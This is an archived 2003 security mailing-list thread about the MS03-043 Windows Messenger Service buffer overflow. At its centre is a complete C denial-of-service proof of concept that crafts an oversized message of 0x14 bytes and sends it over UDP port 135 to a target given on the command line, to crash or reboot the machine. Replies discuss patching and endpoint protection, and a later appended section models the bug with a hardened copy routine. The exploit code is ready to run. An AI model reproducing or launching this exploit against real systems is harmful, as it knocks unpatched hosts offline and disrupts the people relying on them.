RE: Attack the MS043 vulnerability

From: Scott Morris (swm@emanon.com)
Date: Wed Oct 22 2003 - 09:04:55 GMT-3


That is a much more sane solution, but often one overlooked in security
deployments.....

 
Scott Morris, CCIE4 (R&S/ISP-Dial/Security/Service Provider) #4713,
CISSP, JNCIS, et al.
IPExpert CCIE Program Manager
IPExpert Sr. Technical Instructor
swm@emanon.com/smorris@ipexpert.net
http://www.ipexpert.net

-----Original Message-----
From: nobody@groupstudy.com [mailto:nobody@groupstudy.com] On Behalf Of
Peter
Sent: Tuesday, October 21, 2003 11:02 PM
To: security@groupstudy.com
Cc: ccielab@groupstudy.com
Subject: Re: Attack the MS043 vulnerability

Rather think of Cisco Security Agent for all the desktops and servers.

_____________________________
Peter
#7247 (R&S, Security, SP)
CyscoExpert Corp.
4433 W. Touhy Ave. Suite 410
Lincolnwood, IL 60712
Phone (847) 674-3392
Toll Free (866) CyscoXP (297-2697)
Fax (847) 674-2625

----- Original Message -----
From: "Wright, Jeremy" <wright@admworld.com>
To: "'Brian McGahan '" <bmcgahan@internetworkexpert.com>; "Wright,
Jeremy" <wright@admworld.com>; <security@groupstudy.com>
Cc: <ccielab@groupstudy.com>
Sent: Tuesday, October 21, 2003 9:52 PM
Subject: RE: Attack the MS043 vulnerability

> Yes, and to let upper management understand the importance of patch
management instead of having interns running around like crazy every
other week :)
>
> -----Original Message-----
> From: Brian McGahan
> To: 'Wright, Jeremy'; security@groupstudy.com
> Cc: ccielab@groupstudy.com
> Sent: 10/21/2003 8:23 PM
> Subject: RE: Attack the MS043 vulnerability
>
> Jeremy,
>
> The code sample I'm assuming is for educational and research purposes
> only, right? :)
>
> Brian McGahan, CCIE #8593
> bmcgahan@internetworkexpert.com
>
> Internetwork Expert, Inc.
> http://www.InternetworkExpert.com
> Toll Free: 877-224-8987
> Direct: 708-362-1418 (Outside the US and Canada)
>
>
> > -----Original Message-----
> > From: nobody@groupstudy.com [mailto:nobody@groupstudy.com] On Behalf
> Of
> > Wright, Jeremy
> > Sent: Tuesday, October 21, 2003 8:13 PM
> > To: 'security@groupstudy.com'
> > Cc: 'ccielab@groupstudy.com'
> > Subject: OT:Attack the MS043 vulnerability
> >
> > /*
> > DoS Proof of Concept for MS03-043 - exploitation shouldn't be too hard.
> > Launching it one or two times against the target should make the machine
> > reboot. Tested against a Win2K SP4.
> >
> > "The vulnerability results because the Messenger Service does not properly
> > validate the length of a message before passing it to the allocated
> > buffer" according to MS bulletin. Digging into it a bit more, we find that
> > when a character 0x14 is encountered in the 'body' part of the message, it
> > is replaced by a CR+LF. The buffer allocated for this operation is twice
> > the size of the string, which is the way to go, but is then copied to a
> > buffer which was only allocated 11CAh bytes. Thanks to that, we can bypass
> > the length checks and overflow the fixed size buffer.
> >
> > Credits go to LSD :)
> >
> > */
> >
> > #include <stdio.h>
> > #include <stdlib.h>
> > #include <string.h>
> > #include <time.h>
> > #include <winsock2.h>
> >
> > #pragma comment(lib, "ws2_32.lib")  // Winsock import library (MSVC)
> >
> > // Packet format found thanks to a bit of sniffing
> > static unsigned char packet_header[] =
> > "\x04\x00\x28\x00"
> > "\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> > "\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0"
> > "\x4f\xb6\xe6\xfc"
> > "\xff\xff\xff\xff" // @40 : unique id over 16 bytes ?
> > "\xff\xff\xff\xff" "\xff\xff\xff\xff"
> > "\xff\xff\xff\xff"
> > "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
> > "\x00\x00\xff\xff\xff\xff"
> > "\xff\xff\xff\xff" // @74 : fields length
> > "\x00\x00";
> >
> > static unsigned char field_header[] =
> > "\xff\xff\xff\xff" // @0 : field length
> > "\x00\x00\x00\x00"
> > "\xff\xff\xff\xff"; // @8 : field length
> >
> > int main(int argc, char *argv[])
> > {
> >     int i, packet_size, fields_size, body_max;
> >     SOCKET s;
> >     unsigned char packet[8192];
> >     struct sockaddr_in addr;
> >     // A few conditions :
> >     // 0 <= strlen(from) + strlen(machine) <= 56
> >     // max fields size 3992
> >     char from[] = "RECCA";
> >     char machine[] = "ZEUS";
> >     char body[4096] = "*** MESSAGE ***";
> >     // target may be given on the command line, else the original default
> >     const char *target = (argc > 1) ? argv[1] : "192.168.186.3";
> >
> >     WSADATA wsaData;
> >
> >     if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
> >         exit(EXIT_FAILURE);
> >
> >     ZeroMemory(&addr, sizeof(addr));
> >     addr.sin_family = AF_INET;
> >     addr.sin_addr.s_addr = inet_addr(target);
> >     addr.sin_port = htons(135);
> >
> >     ZeroMemory(packet, sizeof(packet));
> >     packet_size = 0;
> >
> >     memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1);
> >     packet_size += sizeof(packet_header) - 1;
> >
> >     // 'from' field : two copies of the length, then the string, padded to 4
> >     i = (int)strlen(from) + 1;
> >     *(unsigned int *)(&field_header[0]) = i;
> >     *(unsigned int *)(&field_header[8]) = i;
> >     memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
> >     packet_size += sizeof(field_header) - 1;
> >     strcpy((char *)&packet[packet_size], from);
> >     packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4
> >
> >     // 'machine' field : same layout
> >     i = (int)strlen(machine) + 1;
> >     *(unsigned int *)(&field_header[0]) = i;
> >     *(unsigned int *)(&field_header[8]) = i;
> >     memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
> >     packet_size += sizeof(field_header) - 1;
> >     strcpy((char *)&packet[packet_size], machine);
> >     packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4
> >
> >     // room left for the body so that the fields block stays at 3992 bytes
> >     body_max = 3992 - packet_size + (int)sizeof(packet_header)
> >                - (int)sizeof(field_header);
> >     fprintf(stdout, "Max 'body' size (incl. terminal NULL char) = %d\n",
> >             body_max);
> >
> >     // every 0x14 becomes CR+LF on the target, so the expanded body is
> >     // twice as long as the length checks allow for
> >     memset(body, 0x14, sizeof(body));
> >     body[body_max - 1] = '\0';
> >
> >     // 'body' field : not padded
> >     i = (int)strlen(body) + 1;
> >     *(unsigned int *)(&field_header[0]) = i;
> >     *(unsigned int *)(&field_header[8]) = i;
> >     memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
> >     packet_size += sizeof(field_header) - 1;
> >     strcpy((char *)&packet[packet_size], body);
> >     packet_size += i;
> >
> >     fields_size = packet_size - (int)(sizeof(packet_header) - 1);
> >     *(unsigned int *)(&packet[40]) = (unsigned int)time(NULL);
> >     *(unsigned int *)(&packet[74]) = fields_size;
> >
> >     fprintf(stdout, "Total length of strings = %d\nPacket size = %d\n"
> >             "Fields size = %d\n",
> >             (int)(strlen(from) + strlen(machine) + strlen(body)),
> >             packet_size, fields_size);
> >
> >     /* hex dump of the packet, disabled
> >     for (i = 0; i < packet_size; i++)
> >     {
> >         if (i && ((i & 1) == 0))
> >             fprintf(stdout, " ");
> >         if (i && ((i & 15) == 0))
> >             fprintf(stdout, "\n");
> >         fprintf(stdout, "%02x", packet[i]);
> >     }
> >     fprintf(stdout, "\n");
> >     */
> >
> >     if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == INVALID_SOCKET)
> >         exit(EXIT_FAILURE);
> >
> >     if (sendto(s, (const char *)packet, packet_size, 0,
> >                (struct sockaddr *)&addr, sizeof(addr)) == SOCKET_ERROR)
> >         exit(EXIT_FAILURE);
> >     /*
> >     if (recvfrom(s, (char *)packet, sizeof(packet) - 1, 0, NULL, NULL)
> >         == SOCKET_ERROR)
> >         exit(EXIT_FAILURE);
> >     */
> >
> >     closesocket(s);
> >     WSACleanup();
> >     exit(EXIT_SUCCESS);
> > }
> >
> >
> > CONFIDENTIALITY NOTICE:
> > This message is intended for the use of the individual or entity to
> > which it is addressed and may contain information that is privileged,
> > confidential and exempt from disclosure under applicable law. If the
> > reader of this message is not the intended recipient or the employee or
> > agent responsible for delivering this message to the intended recipient,
> > you are hereby notified that any dissemination, distribution or copying
> > of this communication is strictly prohibited.
> > If you have received this communication in error, please notify us
> > immediately by email reply or by telephone and immediately delete this
> > message and any attachments. In the U.S. call us toll free at (800)
> > 637-5843.
> > Spanish, French, Quebecois French, Portuguese, Polish, German, Dutch,
> > Turkish, Russian, Japanese and Chinese:
> > http://www.admworld.com/confidentiality.htm.
> >
> >
> > _______________________________________________________________________
> > Please help support GroupStudy by purchasing your study materials from:
> > http://shop.groupstudy.com
> >
> > Subscription information may be found at:
> > http://www.groupstudy.com/list/CCIELab.html
>
>
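The expansion bug Jeremy's post describes (each 0x14 byte in the body becomes CR+LF, the expanded copy goes into a buffer twice the body size, and that copy is then moved into a fixed 11CAh-byte buffer with no check on the expanded length) as a small C model, added here; it is not code from the post, from Microsoft or from LSD. The sizes are the ones the post gives: 0x11CA for the fixed buffer, 3992 for the fields block; the 3939-byte body is what the PoC's own arithmetic yields for its sample "RECCA"/"ZEUS" names. The vulnerable path does not smash anything, it only reports how far past the fixed buffer the copy would run; the hardened variant checks the expanded length instead of the input length. The "hello<0x14>world" message is a constructed sample.

```c
/* Model of the MS03-043 CR+LF expansion bug described in the post above.
 * Added example, not the Messenger Service's code and not the PoC itself.
 * Assumptions: fixed buffer of 0x11CA bytes and a 3992-byte fields block
 * (both from the post); BODY_MAX is the body size the PoC computes for
 * its sample from/machine names. Nothing here touches the network. */
#include <stdlib.h>
#include <string.h>

#define FIXED_BUF_SIZE 0x11CA   /* 4554 bytes: the fixed buffer named in the post */
#define BODY_MAX       3939     /* body bytes the PoC fits into 3992 fields bytes */

/* Expand 0x14 -> CR LF into out (caller provides 2*len+1 bytes, the
 * "twice the size of the string" allocation). Returns expanded length. */
static size_t expand_0x14(const unsigned char *body, size_t len, unsigned char *out)
{
    size_t n = 0;
    for (size_t k = 0; k < len; k++) {
        if (body[k] == 0x14) { out[n++] = '\r'; out[n++] = '\n'; }
        else                  out[n++] = body[k];
    }
    out[n] = '\0';
    return n;
}

/* Vulnerable path, modelled: the only length check is on the input, so a
 * body that passes it can still expand past the fixed buffer. Returns how
 * many bytes (incl. NUL) would land beyond FIXED_BUF_SIZE, 0 if it fits,
 * -1 if the input-length check itself rejects the body. */
long overflow_bytes(const unsigned char *body, size_t len)
{
    if (len > BODY_MAX) return -1;          /* the pre-expansion check that is done */
    unsigned char *tmp = malloc(2 * len + 1);
    if (!tmp) return -1;
    size_t expanded = expand_0x14(body, len, tmp);
    free(tmp);
    long excess = (long)(expanded + 1) - FIXED_BUF_SIZE;
    return excess > 0 ? excess : 0;
}

/* Hardened path: check the expanded length against the destination. */
int copy_expanded_checked(const unsigned char *body, size_t len,
                          unsigned char *dst, size_t dst_size)
{
    unsigned char *tmp = malloc(2 * len + 1);
    if (!tmp) return -1;
    size_t expanded = expand_0x14(body, len, tmp);
    int rc = -1;
    if (expanded + 1 <= dst_size) {         /* room for the string and its NUL */
        memcpy(dst, tmp, expanded + 1);
        rc = 0;
    }
    free(tmp);
    return rc;
}

/* Smallest number of 0x14 bytes whose expansion no longer fits:
 * the first n with 2n + 1 > FIXED_BUF_SIZE. */
size_t min_overflowing_0x14_count(void)
{
    return (FIXED_BUF_SIZE + 1) / 2;
}

/* Worked case 1: the PoC body (BODY_MAX bytes of 0x14) through both paths.
 * Returns the overflow the vulnerable path would produce; -2 if the
 * hardened copy wrongly accepted it. */
long overflow_for_poc_body(void)
{
    unsigned char body[BODY_MAX];
    unsigned char dst[FIXED_BUF_SIZE];
    memset(body, 0x14, sizeof body);
    long excess = overflow_bytes(body, sizeof body);
    if (copy_expanded_checked(body, sizeof body, dst, sizeof dst) != -1)
        return -2;
    return excess;
}

/* Worked case 2: an ordinary message with a single 0x14 is accepted by both
 * paths. Returns 1 when the hardened copy produced "hello\r\nworld". */
int ordinary_message_ok(void)
{
    static const unsigned char msg[] = "hello\x14world";   /* constructed sample */
    unsigned char dst[FIXED_BUF_SIZE];
    if (overflow_bytes(msg, sizeof msg - 1) != 0) return 0;
    if (copy_expanded_checked(msg, sizeof msg - 1, dst, sizeof dst) != 0) return 0;
    return memcmp(dst, "hello\r\nworld", sizeof "hello\r\nworld") == 0;
}
```

With the PoC's 3939 body bytes the expanded string is 7878 bytes plus NUL, 3325 bytes past a 0x11CA-byte buffer, and any body of 2277 or more 0x14 bytes already overflows, well inside the 3992-byte fields limit the length checks enforce. The fix is the one the hardened function shows: size the check on what is written, not on what was received.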



This archive was generated by hypermail 2.1.4 : Mon Nov 24 2003 - 07:53:06 GMT-3